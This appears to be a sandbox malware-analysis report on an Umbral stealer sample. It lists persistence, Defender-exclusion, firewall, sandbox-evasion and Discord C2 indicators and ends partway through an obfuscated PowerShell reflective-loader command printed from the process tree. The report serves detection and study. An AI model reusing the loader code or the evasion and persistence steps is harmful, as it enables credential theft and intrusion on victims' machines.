Analysis
-
max time kernel
107s -
max time network
151s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
25-05-2024 22:56
Static task
static1
URLScan task
urlscan1
General
Malware Config
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/memory/4620-148-0x00000153A4590000-0x00000153A45D0000-memory.dmp family_umbral behavioral1/memory/4620-148-0x00000153A4590000-0x00000153A45D0000-memory.dmp family_umbral -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 4692 created 632 4692 powershell.EXE 5 PID 4692 created 632 4692 powershell.EXE 5 -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 396 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts G-U.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 5992 netsh.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\86b75138a95544a28f9d9c36000d93cb.exe $77-WindowsServices.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\86b75138a95544a28f9d9c36000d93cb.exe $77-WindowsServices.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\86b75138a95544a28f9d9c36000d93cb.exe taskmgr.exe -
Executes dropped EXE 10 IoCs
pid Process 2348 dll.exe 2876 $.exe 488 $77.exe 4620 G-U.exe 4716 $77-WindowsServices.exe 2348 dll.exe 2876 $.exe 488 $77.exe 4620 G-U.exe 4716 $77-WindowsServices.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\86b75138a95544a28f9d9c36000d93cb = "\"C:\\Users\\Admin\\$77-WindowsServices.exe\" .." $77-WindowsServices.exe Set value (str) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Microsoft\Windows\CurrentVersion\Run\86b75138a95544a28f9d9c36000d93cb = "\"C:\\Users\\Admin\\$77-WindowsServices.exe\" .." $77-WindowsServices.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 1 discord.com 29 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 11 ip-api.com -
Drops file in System32 directory 6 IoCs
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Privacy-Auditing%4Operational.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4692 set thread context of 3984 4692 powershell.EXE 128 PID 4692 set thread context of 3984 4692 powershell.EXE 128 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 5028 wmic.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies data under HKEY_USERS 55 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={885A7A87-AB63-4A76-A8D1-34BE6C1ED385}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1716677899" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sat, 25 May 2024 22:58:20 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe -
NTFS ADS 3 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 405223.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 442283.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\dll.exe:Zone.Identifier msedge.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4420 msedge.exe 4420 msedge.exe 4072 msedge.exe 4072 msedge.exe 4776 msedge.exe 4776 msedge.exe 1468 identity_helper.exe 1468 identity_helper.exe 4832 msedge.exe 4832 msedge.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe 488 $77.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 3320 Explorer.EXE 3320 Explorer.EXE -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 20 IoCs
pid Process 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4620 G-U.exe Token: SeDebugPrivilege 488 $77.exe Token: SeIncreaseQuotaPrivilege 2216 wmic.exe Token: SeSecurityPrivilege 2216 wmic.exe Token: SeTakeOwnershipPrivilege 2216 wmic.exe Token: SeLoadDriverPrivilege 2216 wmic.exe Token: SeSystemProfilePrivilege 2216 wmic.exe Token: SeSystemtimePrivilege 2216 wmic.exe Token: SeProfSingleProcessPrivilege 2216 wmic.exe Token: SeIncBasePriorityPrivilege 2216 wmic.exe Token: SeCreatePagefilePrivilege 2216 wmic.exe Token: SeBackupPrivilege 2216 wmic.exe Token: SeRestorePrivilege 2216 wmic.exe Token: SeShutdownPrivilege 2216 wmic.exe Token: SeDebugPrivilege 2216 wmic.exe Token: SeSystemEnvironmentPrivilege 2216 wmic.exe Token: SeRemoteShutdownPrivilege 2216 wmic.exe Token: SeUndockPrivilege 2216 wmic.exe Token: SeManageVolumePrivilege 2216 wmic.exe Token: 33 2216 wmic.exe Token: 34 2216 wmic.exe Token: 35 2216 wmic.exe Token: 36 2216 wmic.exe Token: SeIncreaseQuotaPrivilege 2216 wmic.exe Token: SeSecurityPrivilege 2216 wmic.exe Token: SeTakeOwnershipPrivilege 2216 wmic.exe Token: SeLoadDriverPrivilege 2216 wmic.exe Token: SeSystemProfilePrivilege 2216 wmic.exe Token: SeSystemtimePrivilege 2216 wmic.exe Token: SeProfSingleProcessPrivilege 2216 wmic.exe Token: SeIncBasePriorityPrivilege 2216 wmic.exe Token: SeCreatePagefilePrivilege 2216 wmic.exe Token: SeBackupPrivilege 2216 wmic.exe Token: SeRestorePrivilege 2216 wmic.exe Token: SeShutdownPrivilege 2216 wmic.exe Token: SeDebugPrivilege 2216 wmic.exe Token: SeSystemEnvironmentPrivilege 2216 wmic.exe Token: SeRemoteShutdownPrivilege 2216 wmic.exe Token: SeUndockPrivilege 2216 wmic.exe Token: SeManageVolumePrivilege 2216 wmic.exe Token: 33 2216 wmic.exe Token: 34 2216 wmic.exe Token: 35 2216 wmic.exe Token: 36 2216 wmic.exe Token: SeDebugPrivilege 396 powershell.exe Token: SeDebugPrivilege 3556 powershell.exe Token: SeDebugPrivilege 4692 powershell.EXE Token: SeDebugPrivilege 5032 powershell.exe Token: SeDebugPrivilege 4976 powershell.exe Token: SeIncreaseQuotaPrivilege 1684 wmic.exe Token: SeSecurityPrivilege 1684 wmic.exe Token: SeTakeOwnershipPrivilege 1684 wmic.exe Token: SeLoadDriverPrivilege 1684 wmic.exe Token: SeSystemProfilePrivilege 1684 wmic.exe Token: SeSystemtimePrivilege 1684 wmic.exe Token: SeProfSingleProcessPrivilege 1684 wmic.exe Token: SeIncBasePriorityPrivilege 1684 wmic.exe Token: SeCreatePagefilePrivilege 1684 wmic.exe Token: SeBackupPrivilege 1684 wmic.exe Token: SeRestorePrivilege 1684 wmic.exe Token: SeShutdownPrivilege 1684 wmic.exe Token: SeDebugPrivilege 1684 wmic.exe Token: SeSystemEnvironmentPrivilege 1684 wmic.exe Token: SeRemoteShutdownPrivilege 1684 wmic.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe 3740 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4072 wrote to memory of 900 4072 msedge.exe 78 PID 4072 wrote to memory of 900 4072 msedge.exe 78 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 992 4072 msedge.exe 79 PID 4072 wrote to memory of 4420 4072 msedge.exe 80 PID 4072 wrote to memory of 4420 4072 msedge.exe 80 PID 4072 wrote to memory of 4432 4072 msedge.exe 81 PID 4072 wrote to memory of 4432 4072 msedge.exe 81 PID 4072 wrote to memory of 4432 4072 msedge.exe 81 PID 4072 wrote to memory of 4432 4072 msedge.exe 81 PID 4072 wrote to memory of 4432 4072 msedge.exe 81 PID 4072 wrote to memory of 4432 4072 msedge.exe 81 PID 4072 wrote to memory of 4432 4072 msedge.exe 81 PID 4072 wrote to memory of 4432 4072 msedge.exe 81 PID 4072 wrote to memory of 4432 4072 msedge.exe 81 PID 4072 wrote to memory of 4432 4072 msedge.exe 81 PID 4072 wrote to memory of 4432 4072 msedge.exe 81 PID 4072 wrote to memory of 4432 4072 msedge.exe 81 PID 4072 wrote to memory of 4432 4072 msedge.exe 81 PID 4072 wrote to memory of 4432 4072 msedge.exe 81 PID 4072 wrote to memory of 4432 4072 msedge.exe 81 PID 4072 wrote to memory of 4432 4072 msedge.exe 81 PID 4072 wrote to memory of 4432 4072 msedge.exe 81 PID 4072 wrote to memory of 4432 4072 msedge.exe 81 PID 4072 wrote to memory of 4432 4072 msedge.exe 81 PID 4072 wrote to memory of 4432 4072 msedge.exe 81 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:632
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:556
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{1469827a-cc20-4e2d-bc32-8091d9360f44}2⤵PID:3984
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:996
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:436
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1044
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1060
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:1080
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1192
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1268
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1280
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:kXeouvKYZuVv{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$spuZpSnZALQkcs,[Parameter(Position=1)][Type]$hzXCyOoQnz)$wFJwrWHASHH=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+'f'+''+[Char](108)+''+'e'+''+'c'+''+[Char](116)+''+'e'+'dD'+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+'e'+[Char](109)+''+[Char](111)+'ry'+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+[Char](121)+'pe','C'+[Char](108)+''+[Char](97)+''+'s'+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+'i'+'c'+','+[Char](83)+''+[Char](101)+''+'a'+'l'+'e'+''+[Char](100)+''+','+''+[Char](65)+'n'+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s,'+'A'+''+[Char](117)+'t'+'o'+'Cla'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$wFJwrWHASHH.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e'+','+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$spuZpSnZALQkcs).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'ti'+'m'+'e'+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');$wFJwrWHASHH.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+'o'+[Char](107)+'e',''+[Char](80)+'u'+'b'+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+'H'+'ide'+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+'S'+[Char](108)+''+[Char](111)+'t'+','+''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+'l',$hzXCyOoQnz,$spuZpSnZALQkcs).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+'t'+'i'+[Char](109)+''+[Char](101)+','+'M'+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');Write-Output $wFJwrWHASHH.CreateType();}$VtCvrZYfQqSEI=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 